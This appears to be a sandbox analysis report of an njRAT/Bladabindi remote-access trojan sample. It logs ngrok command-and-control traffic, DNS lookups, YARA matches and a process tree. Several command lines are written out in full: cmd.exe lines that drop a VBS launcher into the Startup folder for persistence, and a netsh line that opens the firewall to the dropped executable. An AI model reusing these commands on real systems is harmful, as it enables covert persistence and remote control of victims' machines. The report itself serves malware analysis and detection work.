                                                                                        Feb 8, 2024 06:54:17.728955030 CET4975419208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:54:18.990099907 CET4975419208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:54:19.301290035 CET19208497543.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:54:21.440963984 CET4975519208192.168.2.43.6.115.182
                                                                                        Feb 8, 2024 06:54:21.757199049 CET19208497553.6.115.182192.168.2.4
                                                                                        Feb 8, 2024 06:54:21.757291079 CET4975519208192.168.2.43.6.115.182
                                                                                        Feb 8, 2024 06:54:22.426882982 CET19208497553.6.115.182192.168.2.4
                                                                                        Feb 8, 2024 06:54:22.614939928 CET4975519208192.168.2.43.6.115.182
                                                                                        Feb 8, 2024 06:54:37.956661940 CET19208497553.6.115.182192.168.2.4
                                                                                        Feb 8, 2024 06:54:37.956773996 CET4975519208192.168.2.43.6.115.182
                                                                                        Feb 8, 2024 06:54:53.280251026 CET19208497553.6.115.182192.168.2.4
                                                                                        Feb 8, 2024 06:54:53.280303001 CET4975519208192.168.2.43.6.115.182
                                                                                        Feb 8, 2024 06:54:57.629246950 CET4975519208192.168.2.43.6.115.182
                                                                                        Feb 8, 2024 06:54:57.945998907 CET19208497553.6.115.182192.168.2.4
                                                                                        Feb 8, 2024 06:54:57.946110964 CET4975519208192.168.2.43.6.115.182
                                                                                        Feb 8, 2024 06:54:58.163780928 CET19208497553.6.115.182192.168.2.4
                                                                                        Feb 8, 2024 06:54:58.175700903 CET19208497553.6.115.182192.168.2.4
                                                                                        Feb 8, 2024 06:54:58.175721884 CET19208497553.6.115.182192.168.2.4
                                                                                        Feb 8, 2024 06:54:58.175797939 CET4975519208192.168.2.43.6.115.182
                                                                                        Feb 8, 2024 06:54:58.175827980 CET4975519208192.168.2.43.6.115.182
                                                                                        Feb 8, 2024 06:54:58.262989044 CET19208497553.6.115.182192.168.2.4
                                                                                        Feb 8, 2024 06:54:58.492016077 CET19208497553.6.115.182192.168.2.4
                                                                                        Feb 8, 2024 06:54:58.492065907 CET19208497553.6.115.182192.168.2.4
                                                                                        Feb 8, 2024 06:55:08.199980974 CET4975619208192.168.2.43.6.115.182
                                                                                        Feb 8, 2024 06:55:08.511111021 CET19208497563.6.115.182192.168.2.4
                                                                                        Feb 8, 2024 06:55:08.511215925 CET4975619208192.168.2.43.6.115.182
                                                                                        Feb 8, 2024 06:55:09.115459919 CET19208497563.6.115.182192.168.2.4
                                                                                        Feb 8, 2024 06:55:09.224248886 CET4975619208192.168.2.43.6.115.182
                                                                                        Feb 8, 2024 06:55:24.546283960 CET19208497563.6.115.182192.168.2.4
                                                                                        Feb 8, 2024 06:55:24.546421051 CET4975619208192.168.2.43.6.115.182
                                                                                        Feb 8, 2024 06:55:39.862131119 CET19208497563.6.115.182192.168.2.4
                                                                                        Feb 8, 2024 06:55:39.862287045 CET4975619208192.168.2.43.6.115.182
                                                                                        Feb 8, 2024 06:55:55.174097061 CET19208497563.6.115.182192.168.2.4
                                                                                        Feb 8, 2024 06:55:55.174159050 CET4975619208192.168.2.43.6.115.182
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Feb 8, 2024 06:52:16.763992071 CET6533353192.168.2.41.1.1.1
                                                                                        Feb 8, 2024 06:52:16.884437084 CET53653331.1.1.1192.168.2.4
                                                                                        Feb 8, 2024 06:53:19.826287985 CET5074053192.168.2.41.1.1.1
                                                                                        Feb 8, 2024 06:53:19.945987940 CET53507401.1.1.1192.168.2.4
                                                                                        Feb 8, 2024 06:54:21.279057026 CET5548853192.168.2.41.1.1.1
                                                                                        Feb 8, 2024 06:54:21.398575068 CET53554881.1.1.1192.168.2.4
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Feb 8, 2024 06:52:16.763992071 CET192.168.2.41.1.1.10xfff2Standard query (0)0.tcp.in.ngrok.ioA (IP address)IN (0x0001)false
                                                                                        Feb 8, 2024 06:53:19.826287985 CET192.168.2.41.1.1.10x5ac1Standard query (0)0.tcp.in.ngrok.ioA (IP address)IN (0x0001)false
                                                                                        Feb 8, 2024 06:54:21.279057026 CET192.168.2.41.1.1.10xbbb7Standard query (0)0.tcp.in.ngrok.ioA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Feb 8, 2024 06:52:16.884437084 CET1.1.1.1192.168.2.40xfff2No error (0)0.tcp.in.ngrok.io3.6.115.64A (IP address)IN (0x0001)false
                                                                                        Feb 8, 2024 06:53:19.945987940 CET1.1.1.1192.168.2.40x5ac1No error (0)0.tcp.in.ngrok.io3.6.98.232A (IP address)IN (0x0001)false
                                                                                        Feb 8, 2024 06:54:21.398575068 CET1.1.1.1192.168.2.40xbbb7No error (0)0.tcp.in.ngrok.io3.6.115.182A (IP address)IN (0x0001)false

                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:06:51:50
                                                                                        Start date:08/02/2024
                                                                                        Path:C:\Users\user\Desktop\nOZ2Oqnzbz.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\Desktop\nOZ2Oqnzbz.exe
                                                                                        Imagebase:0x400000
                                                                                        File size:348'002 bytes
                                                                                        MD5 hash:ACB30A04DA7096C99877B47F3050190D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        Antivirus matches:
                                                                                        • Detection: 0%, ReversingLabs
                                                                                        • Detection: 0%, Virustotal, Browse
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:1
                                                                                        Start time:06:51:50
                                                                                        Start date:08/02/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\nOZ2Oqnzbz.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
                                                                                        Imagebase:0x240000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:06:51:50
                                                                                        Start date:08/02/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:06:51:51
                                                                                        Start date:08/02/2024
                                                                                        Path:C:\Users\user\Desktop\nOZ2Oqnzbz.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\Desktop\nOZ2Oqnzbz.exe
                                                                                        Imagebase:0x400000
                                                                                        File size:348'002 bytes
                                                                                        MD5 hash:ACB30A04DA7096C99877B47F3050190D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:06:51:58
                                                                                        Start date:08/02/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\WindowsServices.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:348'002 bytes
                                                                                        MD5 hash:ACB30A04DA7096C99877B47F3050190D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        Antivirus matches:
                                                                                        • Detection: 0%, ReversingLabs
                                                                                        • Detection: 0%, Virustotal, Browse
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:06:51:59
                                                                                        Start date:08/02/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
                                                                                        Imagebase:0x240000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:06:51:59
                                                                                        Start date:08/02/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:7
                                                                                        Start time:06:51:59
                                                                                        Start date:08/02/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                                        Imagebase:0x400000
                                                                                        File size:348'002 bytes
                                                                                        MD5 hash:ACB30A04DA7096C99877B47F3050190D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Target ID:8
                                                                                        Start time:06:52:01
                                                                                        Start date:08/02/2024
                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
                                                                                        Imagebase:0x800000
                                                                                        File size:170'496 bytes
                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:9
                                                                                        Start time:06:52:01
                                                                                        Start date:08/02/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\WindowsServices.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:348'002 bytes
                                                                                        MD5 hash:ACB30A04DA7096C99877B47F3050190D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:10
                                                                                        Start time:06:52:01
                                                                                        Start date:08/02/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
                                                                                        Imagebase:0x240000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:11
                                                                                        Start time:06:52:01
                                                                                        Start date:08/02/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:12
                                                                                        Start time:06:52:02
                                                                                        Start date:08/02/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                                        Imagebase:0x400000
                                                                                        File size:348'002 bytes
                                                                                        MD5 hash:ACB30A04DA7096C99877B47F3050190D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:14
                                                                                        Start time:06:52:09
                                                                                        Start date:08/02/2024
                                                                                        Path:C:\Windows\SysWOW64\netsh.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE
                                                                                        Imagebase:0x1560000
                                                                                        File size:82'432 bytes
                                                                                        MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:15
                                                                                        Start time:06:52:09
                                                                                        Start date:08/02/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:18
                                                                                        Start time:06:52:20
                                                                                        Start date:08/02/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
                                                                                        Imagebase:0x400000
                                                                                        File size:348'002 bytes
                                                                                        MD5 hash:ACB30A04DA7096C99877B47F3050190D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                        • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:19
                                                                                        Start time:06:52:21
                                                                                        Start date:08/02/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
                                                                                        Imagebase:0x240000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:20
                                                                                        Start time:06:52:21
                                                                                        Start date:08/02/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:21
                                                                                        Start time:06:52:22
                                                                                        Start date:08/02/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                                        Imagebase:0x400000
                                                                                        File size:348'002 bytes
                                                                                        MD5 hash:ACB30A04DA7096C99877B47F3050190D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                        • Rule: Njrat, Description: detect njRAT in memory, Source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
